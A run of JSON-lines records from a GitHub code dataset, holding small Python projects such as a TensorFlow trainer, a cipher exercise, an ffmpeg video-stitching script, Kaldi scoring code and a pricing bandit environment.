learning_rate, {'loss_weights': [0.3, 0.3, 1.0]})\n elif isinstance(model, ResNet):\n return get_resnet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, InceptionV2):\n return get_inceptionv2_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.4, 1.0]})\n elif isinstance(model, InceptionV3):\n return get_inceptionv3_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.4, 1.0], 'label_smoothings': [0.1, 0.1]})\n else:\n return self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, options)\n\n # default to use AdamOptimizer w/ softmax_cross_entropy_with_logits_v2\n def run_training(self,\n epochs, batch_size, learning_rate,\n save_model_to, save_every_epoch=1,\n options=None):\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n self.__train__(input, output,\n cost, train_op, accuracy,\n epochs, batch_size,\n save_model_to, save_every_epoch)\n\n def resume_training_from_ckpt(self, epochs, batch_size, learning_rate, save_model_from, save_model_to, save_every_epoch=1, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver(tf.trainable_variables())\n saver.restore(sess, save_model_from)\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver1 = tf.train.Saver()\n saver1.save(sess, save_model_to, global_step=epoch+1, write_meta_graph=False)\n\n def run_transfer_learning(self,\n epochs, batch_size, learning_rate,\n save_model_from, save_model_to, save_every_epoch=1, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n var_list = []\n for var in tf.model_variables():\n if 'final' not in var.name:\n var_list.append(var)\n\n saver = tf.train.Saver(var_list)\n saver.restore(sess, save_model_from)\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver2 = tf.train.Saver()\n saver2.save(sess, save_model_to, global_step=epoch+1, write_meta_graph=False)\n\n def run_testing(self,\n data, save_model_from, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, _ = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n final_out_layer = out_layers[len(out_layers)-1]\n softmax_result = tf.nn.softmax(final_out_layer)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver(tf.trainable_variables())\n saver.restore(sess, save_model_from)\n\n results = sess.run(softmax_result,\n feed_dict={input:data})\n\n return results\n","repo_name":"deep-diver/DeepModels","sub_path":"trainers/clftrainer.py","file_name":"clftrainer.py","file_ext":"py","file_size_in_byte":12924,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"16"} +{"seq_id":"3595623474","text":"car_running = False\nwhile True:\n mp = input(\">\")\n if mp.lower() == \"help\":\n print('''start - to start the car \nstop - to stop the car \nquit - to exit''')\n elif mp == \"start\":\n if not car_running:\n car_running = True\n print(\"Car started...Ready to go!\")\n else:\n print(\"Car's already started, what are you doing ?\")\n elif mp == \"stop\":\n if car_running:\n car_running = False\n print(\"car stopped.\")\n else:\n print(\"car was not running, cannot be stopped\")\n elif mp == \"quit\":\n print(\"thank you for using this products\")\n break\n else:\n # continue while loop\n print(\"I don't understand that...\")\n","repo_name":"redDevil1UR/helloworld","sub_path":"car_game.py","file_name":"car_game.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43590040634","text":"import utils\nfrom photfdtd import Ring, Grid, Solve\n\nif __name__ == \"__main__\":\n\n background_index = 1.0\n\n ring = Ring(\n outer_radius=100,\n zlength=20,\n x=150,\n y=150,\n z=13,\n width=20,\n length=0,\n gap=5,\n name=\"ring\",\n refractive_index=3.47,\n direction=1,\n background_index=background_index\n )\n\n grid = Grid(grid_xlength=300, grid_ylength=300, grid_zlength=25, grid_spacing=20e-9, total_time=1000,\n pml_width_x=50, pml_width_y=20, pml_width_z=1,\n permittivity=background_index ** 2, foldername=\"test_ring\")\n\n grid.set_source(\n source_type=\"planesource\",\n x=100,\n xlength=0,\n y=35,\n ylength=21,\n pulse_type=\"None\",\n z=13,\n zlength=22,\n period=1550e-9 / 299792458,\n )\n\n grid.set_detector(detector_type=\"blockdetector\",\n x=250,\n xlength=0,\n y=37,\n ylength=21,\n z=13,\n zlength=22,\n name=\"detector\")\n\n grid.add_object(ring)\n\n # 创建solve对象\n solve = Solve(grid=grid)\n\n solve._plot_(axis='z',\n index=13,\n filepath=grid.folder)\n\n grid.run()\n\n grid.save_simulation()\n\n grid.save_fig(axis=\"z\",\n axis_number=13)\n grid.save_fig(axis=\"x\",\n axis_number=150)\n\n data = Grid.read_simulation(folder=grid.folder)\n","repo_name":"phot-lab/photfdtd","sub_path":"examples/ring_ex.py","file_name":"ring_ex.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"17337429484","text":"from typing import Any, Callable, Pattern, Set, Type, Generator\nimport os\nfrom passlib.hash import pbkdf2_sha256\n\n\nclass BaseUtils:\n\n @classmethod\n def all_base_classes(cls, class_: Type) -> Set:\n base_class_set = set(class_.__bases__)\n all_base_class_set = {class_}\n all_base_class_set.update(base_class_set)\n for base in base_class_set:\n all_base_class_set.update(cls.all_base_classes(base))\n return all_base_class_set\n\n @classmethod\n def walk_all_parent_dirs(cls, path: str) -> Generator:\n \"\"\"\n Yield directories starting from the given directory up to the root\n \"\"\"\n if not os.path.exists(path):\n raise IOError(\"Starting path not found\")\n\n if os.path.isfile(path):\n path = os.path.dirname(path)\n\n last_dir = None\n current_dir = os.path.abspath(path)\n while last_dir != current_dir:\n yield current_dir\n parent_dir = os.path.abspath(os.path.join(current_dir, os.path.pardir))\n last_dir, current_dir = current_dir, parent_dir\n","repo_name":"mo1ein/feedbook","sub_path":"src/utils/base_utils.py","file_name":"base_utils.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25158168515","text":"import string\nimport math\n\ndef baris_maks(panjang_plaintext):\n pola1 = 1\n pola2 = 2 \n while (pola1 < panjang_plaintext):\n pola1 = pola1 + pola2\n return math.ceil(math.sqrt(pola1))\n\n\ndef enkripsi(barismaks, plaintext, kolom, baris):\n array = [['' for y in range(int(kolom))] for x in range(int(baris))]\n penghitung_string = 0\n hasil_enkripsi = ''\n dikunjungi = [False for x in range(kolom)]\n\n for i in range(int(baris)):\n kolom_mulai = baris - i - 1\n for j in range(int(kolom)):\n if (j >= kolom_mulai and j < kolom - kolom_mulai) and len(plaintext) >= penghitung_string: \n if penghitung_string >= len(plaintext):\n array[i][j] = 'x'\n else:\n array[i][j] = plaintext[penghitung_string]\n penghitung_string = penghitung_string + 1\n if penghitung_string == len(plaintext):\n break\n\n for i in range(int(baris)):\n for j in range(int(kolom)):\n if dikunjungi[j] == False:\n for k in range(int(baris)):\n if array[k][j] != '':\n hasil_enkripsi = hasil_enkripsi + array[k][j]\n dikunjungi[j] = True\n else:\n continue\n\n return hasil_enkripsi\n\nc\n\ndef main():\n plaintext = 'ikanhiumakantomat'\n panjang_plaintext = len(plaintext)\n barismaks = baris_maks(panjang_plaintext)\n kolom, baris = 2 * barismaks - 1, barismaks\n print(enkripsi(barismaks, plaintext, kolom, baris))\n\n ciphertext = \"tkxhaxkinxiautxnmoxamxaxx\"\n panjang_ciphertext = len(ciphertext)\n barismaks = baris_maks(panjang_ciphertext)\n kolom, baris = 2 * barismaks - 1, barismaks\n print(dekripsi(barismaks, ciphertext, kolom, baris))\n\nif __name__ == \"__main__\":\n main()","repo_name":"suriadivjr/uasPrakKripto","sub_path":"triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37121531945","text":"import itertools\nimport functools\nimport re\nimport math\n\nfrom copy import deepcopy\n\nINPUT_FILE = 'input.txt'\n\ndef read_file(filename, func=None):\n result = []\n with open(filename, 'r') as f:\n for line in f:\n result.append(func(line.strip()) if func else line.strip())\n return result\n\ndef main1():\n lines = read_file(INPUT_FILE)\n position = 0\n depth = 0\n for l in lines:\n inst, value = l.split(' ')\n value = int(value)\n if inst == \"forward\":\n position += value\n elif inst == \"down\":\n depth += value\n else:\n depth -= value\n print(position * depth)\n\ndef main2():\n lines = read_file(INPUT_FILE)\n position = 0\n depth = 0\n aim = 0\n for l in lines:\n inst, value = l.split(' ')\n if inst == \"forward\":\n position += int(value)\n depth += aim * int(value)\n elif inst == \"down\":\n aim += int(value)\n else:\n aim -= int(value)\n print(depth * position)\n \nif __name__ == \"__main__\":\n main1()\n main2()\n","repo_name":"Universemul/AdventOfCode2021","sub_path":"python/day2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27413717564","text":"import os\nimport inspect\nimport click\nimport tempfile\nimport shutil\nimport subprocess\nimport logging\nimport time\n\nimport stitch_common as sc\n\nFILE_ENDING = 'mp4'\nMAX_ATTEMPTS = 3\nLOCAL_FFMPEG_PATH = 'ffmpeg/bin'\n\n\n@click.command()\n@click.argument('root_dir')\n@click.argument('base_out_dir')\n@click.option('--root_tmp_dir', default=None, help='Where tmp folders should be generated')\n@click.option('--rename_on_copy', default=True, is_flag=True)\n@click.option('--local_ffmpeg', default=True, is_flag=True)\ndef stitch_videos(root_dir, base_out_dir, root_tmp_dir, rename_on_copy, local_ffmpeg):\n if root_tmp_dir:\n logging.info('Setting directory where temp folders will be created: \"{}\".'.format(root_tmp_dir))\n os.environ['TMPDIR'] = root_tmp_dir\n\n if local_ffmpeg:\n ffmpeg_path = os.path.join(os.path.dirname(os.path.abspath(inspect.getsourcefile(lambda: 0))),\n LOCAL_FFMPEG_PATH)\n if not os.path.isdir(ffmpeg_path):\n logging.fatal('ffmpeg path is incorrect:'.format(ffmpeg_path))\n else:\n ffmpeg_path = 'ffmpeg'\n\n logging.info('Using ffmpeg: {}'.format(ffmpeg_path))\n\n logging.info('Starting the stitching process.')\n if rename_on_copy:\n logging.info('** Rename on copy mode enabled.')\n # We have a number of renaming strategies:\n # 1) if there is only a single directory that contains the files, assume it is a full trip + set code\n # 2) if there are two directories, assume the first is the trip code and the second the set code\n # 3) if there are three directories, follow assumption (2) and add a stereo L or R directory\n for trip_name in get_subdirs(root_dir):\n trip_path = os.path.join(root_dir, trip_name)\n join_mp4s(trip_path, base_out_dir, '{}.mp4'.format(trip_name), ffmpeg_path)\n for set_name in get_subdirs(trip_path):\n set_path = os.path.join(trip_path, set_name)\n join_mp4s(set_path, base_out_dir, '{}_{}.mp4'.format(trip_name, set_name), ffmpeg_path)\n for camera in get_subdirs(set_path):\n camera_path = os.path.join(set_path, camera)\n if camera.lower().startswith('l'):\n camera_abbrv = 'L'\n elif camera.lower().startswith('r'):\n camera_abbrv = 'R'\n else:\n logging.warning('Unexpected camera folder: {}'.format(camera_path))\n break\n join_mp4s(camera_path, base_out_dir, '{}_{}_{}.mp4'.format(trip_name, set_name, camera_abbrv),\n ffmpeg_path)\n else:\n for root, subdirs, files in os.walk(root_dir):\n directory = remove_prefix(root, root_dir)\n out_dir = base_out_dir + os.path.sep + directory\n out_file_name = 'joined.' + FILE_ENDING\n if os.path.exists(out_file_name):\n logging.warning('***Skipping: \"{}\" already exists'.format(out_file_name))\n else:\n join_mp4s(root, out_dir, out_file_name, ffmpeg_path)\n\n\ndef join_mp4s(in_dir, out_dir, out_file_name, ffmpeg_path):\n files = get_files(in_dir)\n attempt_count = 0\n while attempt_count < MAX_ATTEMPTS:\n attempt_count += 1\n with tempfile.TemporaryDirectory() as tmpdir:\n logging.info('**** Processing folder: {}'.format(in_dir))\n mp4s = sorted([fi for fi in files if not fi.startswith('._')])\n file_text = ''\n # mp4s should be sorted alpha\n for vid in mp4s:\n logging.info('Copying video {}'.format(vid))\n shutil.copyfile(in_dir + os.path.sep + vid, tmpdir + os.path.sep + vid)\n if vid.lower().endswith('.mts'):\n logging.info('Processing mts videos')\n output_name = vid.rsplit('.', 1)\n output_file = output_name[0] + '.mp4'\n mts_to_mp4(tmpdir, ffmpeg_path, vid, output_file)\n file_text += \"file '{}/{}'\\n\".format(tmpdir, output_file)\n else:\n file_text += \"file '{}/{}'\\n\".format(tmpdir, vid)\n if len(mp4s) > 0:\n mp4_list_file = open('{}/mp4_list.txt'.format(tmpdir), 'w')\n mp4_list_file.write(file_text)\n mp4_list_file.close()\n\n concat_mp4s(tmpdir, ffmpeg_path)\n\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n if FILE_ENDING == 'avi':\n mp4_to_avi(tmpdir, ffmpeg_path)\n\n joined_file = tmpdir + os.path.sep + 'joined.' + FILE_ENDING\n if len(sc.get_video_details(joined_file, ffmpeg_path)) == 0:\n logging.error('Joined file is unreadable! Trying again in a minute.')\n time.sleep(60)\n else:\n logging.info('-----------------------------------------')\n # get fps values\n output_result = check_fps(tmpdir, ffmpeg_path, joined_file)\n split_array = output_result.split(\"/\")\n numerator = int(split_array[0])\n denominator = int(split_array[1])\n # do the math\n math = numerator / denominator\n\n if math > 30:\n downsample(tmpdir, ffmpeg_path, joined_file)\n ouput_file = tmpdir + os.path.sep + 'output.' + FILE_ENDING\n logging.info('Copying {} to final location...'.format(ouput_file))\n shutil.copyfile(\n ouput_file,\n os.path.join(out_dir, out_file_name)\n )\n logging.info('Finished folder.\\n')\n break # exit retry loop\n else:\n logging.info('Copying {} to final location...'.format(joined_file))\n shutil.copyfile(\n joined_file,\n os.path.join(out_dir, out_file_name)\n )\n logging.info('Finished folder.\\n')\n break # exit retry loop\n else:\n logging.info('No mp4s found in folder.')\n attempt_count = MAX_ATTEMPTS\n if attempt_count >= MAX_ATTEMPTS:\n logging.error('Giving up after multiple retries trying to stitch {}'.format(in_dir))\n\n\ndef get_subdirs(folder):\n return [xx for xx in os.listdir(folder) if os.path.isdir(os.path.join(folder, xx))]\n\n\ndef get_files(folder):\n return [xx for xx in os.listdir(folder) if os.path.isfile(os.path.join(folder, xx))]\n\n\ndef concat_mp4s(tmpdir, ffmpeg_path):\n logging.info('Concatenating mp4s...')\n run_external_command(\n '{} -f concat -safe 0 -i mp4_list.txt -c copy joined.mp4'.format(os.path.join(ffmpeg_path, 'ffmpeg')),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef mp4_to_avi(tmpdir, ffmpeg_path):\n logging.info('Converting from mp4 to avi...')\n run_external_command(\n '{} -i joined.mp4 -vcodec copy -r 29.97 -an joined.avi'.format(os.path.join(ffmpeg_path, 'ffmpeg')),\n tmpdir)\n\n\ndef mts_to_mp4(tmpdir, ffmpeg_path, input_file, output_file):\n logging.info('Converting from mts to mp4...')\n run_external_command(\n '{} -i {} -vcodec mpeg4 -b:v 15M -acodec libmp3lame -b:a 192k {}'.format(os.path.join(ffmpeg_path, 'ffmpeg'),\n input_file, output_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef avi_to_mp4(tmpdir, ffmpeg_path, input_file, output_file):\n logging.info('Converting from avi to mp4...')\n run_external_command(\n '{} -i {} -c:v libx264 -c:a copy {}'.format(os.path.join(ffmpeg_path, 'ffmpeg'), input_file, output_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef downsample(tmpdir, ffmpeg_path, input_file):\n logging.info('Downsampling...')\n run_external_command(\n '{} -i {} -threads 0 -r 29.97 -y output.mp4'.format(os.path.join(ffmpeg_path, 'ffmpeg'), input_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef check_fps(tmpdir, ffmpeg_path, inputfile):\n logging.info('Checking fps...')\n # the shell command\n command = '{} -v error -select_streams v -of default=noprint_wrappers=1:nokey=1 -show_entries stream=r_frame_rate {}'.format(\n os.path.join(ffmpeg_path, 'ffprobe'), inputfile)\n process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=None, shell=True, cwd=tmpdir)\n # Launch the shell command:\n output, error = process.communicate()\n return output.decode(\"utf-8\")\n\n\ndef run_external_command(command, tmpdir):\n subprocess.call(\n command,\n shell=True,\n cwd=tmpdir\n )\n\n\ndef remove_prefix(text, prefix):\n if text.startswith(prefix):\n return text[len(prefix):]\n return text\n\n\nif __name__ == '__main__':\n logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', level=logging.INFO)\n stitch_videos()\n","repo_name":"GlobalFinPrint/video_stitching","sub_path":"bulk_stitch.py","file_name":"bulk_stitch.py","file_ext":"py","file_size_in_byte":9351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16920183580","text":"import sys\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QDockWidget, QWidget, QGridLayout, QSlider, QLabel\nfrom PyQt5.QtCore import Qt\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.backends.backend_qt4agg\n\nclass MainWindow(QMainWindow):\n x = np.arange(1, 100, 0.001)\n delta = 1\n lim = 13\n A1 = np.random.rand(2,2)\n A2 = np.random.rand(2,2)\n b1 = np.array([0, 0])\n b2 = np.array([0, 0])\n\n def __init__(self):\n QMainWindow.__init__(self)\n\n self.figure = plt.figure()\n self.drawing = self.figure.add_subplot(122)\n self.another = self.figure.add_subplot(121)\n self.canvas = matplotlib.backends.backend_qt4agg.FigureCanvasQTAgg(self.figure)\n\n self.setCentralWidget(self.canvas)\n\n dock = QDockWidget(\"Values\")\n self.addDockWidget(Qt.RightDockWidgetArea, dock)\n\n sliders = QWidget()\n sliders_grid = QGridLayout(sliders)\n\n def add_slider(foo, col, row):\n sld = QSlider(Qt.Horizontal, sliders)\n sld.setMinimum(-10)\n sld.setMaximum(10)\n sld.setFocusPolicy(Qt.NoFocus)\n sld.valueChanged[int].connect(foo)\n sld.valueChanged.connect(self.plot)\n sliders_grid.addWidget(sld, row, col)\n\n add_slider(foo=self.a00, col=0, row=0)\n add_slider(foo=self.a01, col=0, row=1)\n add_slider(foo=self.a10, col=0, row=2)\n add_slider(foo=self.a11, col=0, row=3)\n add_slider(foo=self.c00, col=1, row=0)\n add_slider(foo=self.c01, col=1, row=1)\n add_slider(foo=self.c10, col=1, row=2)\n add_slider(foo=self.c11, col=1, row=3)\n add_slider(foo=self.b10, col=2, row=0)\n add_slider(foo=self.b11, col=2, row=1)\n add_slider(foo=self.b20, col=3, row=0)\n add_slider(foo=self.b21, col=3, row=1)\n \n\n dock.setWidget(sliders)\n\n self.plot()\n \n def a00(self, val):\n self.A1[0][0] = val\n\n def a01(self, val):\n self.A1[0][1] = val\n\n def a10(self, val):\n self.A1[1][0] = val\n\n def a11(self, val):\n self.A1[1][1] = val\n\n def c00(self, val):\n self.A2[0][0] = val\n\n def c01(self, val):\n self.A2[0][1] = val\n\n def c10(self, val):\n self.A2[1][0] = val\n\n def c11(self, val):\n self.A2[1][1] = val\n\n def b10(self, val):\n self.b1[0] = val \n\n def b11(self, val):\n self.b1[1] = val\n\n def b20(self, val):\n self.b2[0] = val\n\n def b21(self, val):\n self.b2[1] = val\n\n def sigm(self, x):\n return 1/(1+np.exp(-x))\n\n\n def neural_net(self, x, A1, A2, b1, b2, ind):\n def layer(x, A, b):\n return self.sigm(A.dot(x) + b)\n y1 = layer(x, A1, b1)\n y2 = layer(y1, A2, b2)\n return y2[ind]\n\n datx = np.arange(-13, 13, 1)\n daty = np.arange(-13, 13, 1)\n\n X, Y = np.meshgrid(np.arange(-13, 13, 1), np.arange(-13, 13, 1))\n\n #Z = X + Y\n def make_z(self, ind):\n Z = []\n for i in self.daty:\n ls = []\n for j in self.datx:\n ls.append(self.neural_net(np.array([j, i]), self.A1, self.A2, self.b1, self.b2, ind))\n Z.append(ls)\n return Z\n\n def plot(self):\n self.drawing.hold(False)\n self.another.contourf(self.X, self.Y, self.make_z(1))\n self.drawing.contourf(self.X, self.Y, self.make_z(0))\n self.drawing.set_ylim(-10, 10)\n self.canvas.draw()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = MainWindow()\n main.show()\n sys.exit(app.exec_())\n","repo_name":"nzinci/Neural-networks-graphical-explaining","sub_path":"nnw.py","file_name":"nnw.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41705359292","text":"import os\n\nfrom utils.utils import run_shell\n\n\ndef score(data, words_path, dir,\n word_ins_penalty=None,\n min_acwt=1,\n max_acwt=20,\n acwt_factor=0.05 # the scaling factor for the acoustic scale. The scaling factor for acoustic likelihoods\n # needs to be 0.5 ~1.0. However, the job submission script can only take integers as the\n # job marker. That's why we set the acwt to be integers (5 ~ 10), but scale them with 0.1\n # when they are actually used.\n ):\n if word_ins_penalty is None:\n word_ins_penalty = [0.0, 0.5, 1.0, 1.5, 2.0]\n # decoing_scripts_folder = os.path.join(os.getcwd(), __name__.split(\".\")[0]) # 'kaldi_decoding_scripts'\n # pl_cmd_script = os.path.join(decoing_scripts_folder, \"utils/run.pl\")\n # assert os.path.exists(pl_cmd_script)\n # assert os.access(pl_cmd_script, os.X_OK)\n # symtab = os.path.join(lang_or_graph, \"words.txt\")\n # assert os.path.exists(symtab)\n # assert os.path.exists(os.path.join(dir, \"lat.1.gz\"))\n # assert os.path.exists(os.path.join(data, \"text\"))\n # int2sym_script = os.path.join(decoing_scripts_folder, \"utils/int2sym.pl\")\n # assert os.path.exists(int2sym_script)\n # assert os.access(int2sym_script, os.X_OK)\n # if not os.path.isdir(os.path.join(dir, \"scoring\", \"log\")):\n # os.makedirs(os.path.join(dir, \"scoring\", \"log\"))\n\n # --cmd \"$decode_cmd\" --nj 10 --beam 17.0 --lattice_beam 8.0 --max-active 5000 --acwt 0.9 \\\n # --skip true --splice true --splice-opts \"--left-context=1 --right-context=1\" --skip-frames 3 --skip-offset 1 \\\n # ${lang_dir}_test_${lm_suffix} $exp_base/$test $train_dir/decode_${test}_${lm_suffix} || exit 1;\n\n # words_path = \"wrds.txt\"\n\n if not os.path.exists(f\"{dir}/scoring\"):\n os.makedirs(f\"{dir}/scoring\")\n\n assert os.environ['EESEN_ROOT']\n lattice_scale_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-scale\"\n lattice_add_penalty_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-add-penalty\"\n lattice_best_path_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-best-path\"\n\n # for wip in word_ins_penalty:\n # for ACWT in range(min_acwt, max_acwt):\n # run_shell(\n # f\"{lattice_scale_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n # + f\"{lattice_add_penalty_bin} --word-ins-penalty={wip} ark:- ark:- |\"\n # + f\"{lattice_best_path_bin} --word-symbol-table={words_path} ark:- ark,t:{dir}/scoring/{ACWT}_{wip}_tra\")\n\n # run_shell(f\"cat {data}/text | sed 's:::g' | sed 's:::g' > {dir}/scoring/test_filt.txt\")\n run_shell(\n f\"cat {data}/text | sed 's:::g' | sed 's:::g' | sed 's:::g' > {dir}/scoring/text_filt\")\n\n compute_wer_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/compute-wer\"\n lattice_1best_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/lattice-1best\"\n nbest_to_ctm_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/nbest-to-ctm\"\n compute_wer_bin = f\"{os.environ['EESEN_ROOT']}/src/decoderbin/compute-wer\"\n\n int2sym_script = os.path.join(os.getcwd(), \"kaldi_decoding_scripts/utils/int2sym.pl\")\n assert os.path.exists(int2sym_script)\n\n # for wip in word_ins_penalty:\n # for ACWT in range(min_acwt, max_acwt):\n # run_shell(f\"cat {dir}/scoring/{ACWT}_{wip}_tra | {int2sym_script} -f 2- {words_path} | \"\n # + f\" sed 's:::g' | sed 's:::g' | sed 's:::g' |\"\n # + f\"{compute_wer_bin} --text --mode=present ark:{dir}/scoring/text_filt ark,p:- {dir}/details_{ACWT}_{wip} >& {dir}/wer_{ACWT}_{wip}\")\n\n convert_ctm_script = os.path.join(os.getcwd(), \"kws_decoder/eesen_utils/convert_ctm.pl\")\n assert os.path.exists(convert_ctm_script)\n name = \"test_name_\"\n # for wip in word_ins_penalty:\n for ACWT in range(min_acwt, max_acwt):\n if not os.path.exists(f\"{dir}/score_{ACWT}/\"):\n os.makedirs(f\"{dir}/score_{ACWT}/\")\n\n run_shell(\n f\"{lattice_1best_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n + f\"{nbest_to_ctm_bin} ark:- - | \"\n + f\"{int2sym_script} -f 5 {words_path} | \"\n + f\"{convert_ctm_script} {data}/segments {data}/reco2file_and_channel\")\n\n run_shell(\n f\"{lattice_1best_bin} --acoustic-scale={ACWT} --ascale-factor={acwt_factor} \\\"ark:gunzip -c {dir}/lat.*.gz|\\\" ark:- | \"\n + f\"{nbest_to_ctm_bin} ark:- - | \"\n + f\"{int2sym_script} -f 5 {words_path} | \"\n + f\"{convert_ctm_script} {data}/segments {data}/reco2file_and_channel \"\n + f\"> {dir}/score_{ACWT}/{name}.ctm\")\n","repo_name":"pfriesch/PhnKWS","sub_path":"kaldi_decoding_scripts/ctc_decoding/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"18397523414","text":"import itertools\n\nimport lightgbm as lgb\nimport numpy as np\nimport pandas as pd\nfrom gym import Env, spaces\n\nfrom bandits.bandits import BinomialBanditEnv\n\n\nclass PricingBernoulliBanditEnv(Env):\n def __init__(self, num_arms, dist, p_min=1, p_max=17, n_customers=100):\n super(PricingBernoulliBanditEnv, self).__init__()\n\n self.num_arms = num_arms\n self.dist = dist # scipy dist\n self.p_min = p_min\n self.p_max = p_max\n\n self.action_space = spaces.Discrete(num_arms)\n self.observation_space = spaces.Discrete(1) # no observations, only rewards\n\n # normalize the prices to [0, 1]\n self.action_to_price = np.linspace(p_min, p_max, num_arms)\n self.mus = 1 - dist.cdf(self.action_to_price)\n self.b_bandit = BinomialBanditEnv(n=n_customers, probs=self.mus)\n\n self.max_reward = np.max(self.mus * self.action_to_price)\n\n def step(self, action):\n assert self.b_bandit.action_space.contains(action)\n\n observation, conversion_reward, done, info = self.b_bandit.step(action)\n price = self.action_to_price[action]\n reward = conversion_reward * price\n return observation, reward, done, info\n\n def reset(self):\n return 0\n\n\ndef get_avocado_df(avocado_path):\n df = pd.read_csv(avocado_path)\n df = df.drop(columns=[\"Unnamed: 0\"])\n df[\"date\"] = df[\"Date\"].astype(\"datetime64[ns]\")\n df = df.sort_values(\"Date\")\n df = df[df[\"date\"] < \"2018-01-01\"]\n df = df[df[\"type\"] == \"conventional\"].reset_index(drop=True)\n\n df[\"price\"] = df[\"AveragePrice\"]\n df[\"quantity\"] = df[\"Total Volume\"]\n\n cols = [\"date\", \"price\", \"quantity\", \"region\"]\n df = df[cols].copy()\n\n aggregated_regions = [\n \"TotalUS\",\n \"West\",\n \"SouthCentral\",\n \"Northeast\",\n \"Southeast\",\n \"Midsouth\",\n \"Plains\",\n \"GreatLakes\",\n \"California\",\n ]\n df = df[~df.region.isin(aggregated_regions)]\n region_to_volume = 